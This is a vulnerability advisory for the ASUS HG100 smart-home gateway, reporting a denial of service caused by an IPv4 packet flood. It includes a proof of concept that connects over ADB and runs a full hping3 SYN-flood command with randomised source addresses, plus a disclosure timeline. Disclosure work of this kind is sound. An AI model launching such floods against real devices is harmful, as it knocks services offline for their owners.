Description:ASUS HG100 devices allow denial of service via an IPv4 packet flood.
This vulnerability was discovered by Mars Cheng at National Center for Cyber Security Technology (NCCST)
data:image/s3,"s3://crabby-images/f13ca/f13ca78d3633ba791ee0431f83756abc4b84b3ac" alt=""
Introduction ASUS HG100 SmartHome GateWay
data:image/s3,"s3://crabby-images/c687f/c687f01c17b19df2dfc5437b72412098d803fb9f" alt=""
Length x width x height | Weight | Wireless connection |
---|---|---|
152 x 67 x 167 mm | 256g | WiFi 802.11b/g/n ; ZigBee PRO ; BlueTooth 4.0 |
Proof of Concept
1.Connect to ASUS Gateway HG100 with ADB
adb connect 192.168.0.108
adb shell
2.Execute IP v4 flood attack
- Use Hping3 tool to execute DoS attack
hping3 -V -c 1000000 -d 120 -S -w 64 --flood --rand-source 192.168.0.108
- Confirm packets status
data:image/s3,"s3://crabby-images/eafa2/eafa2771d930aebe923641f56fd778ac469d9b7a" alt=""
3.Confirm device status
- Unable to connect to ADB, and DoS attack success.
data:image/s3,"s3://crabby-images/f8789/f8789a4d1432bda2f270be7f5858dfdbfa3d3471" alt=""
Timeline
- February 6, 2018 Reported to ASUS Security
Reference
[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11492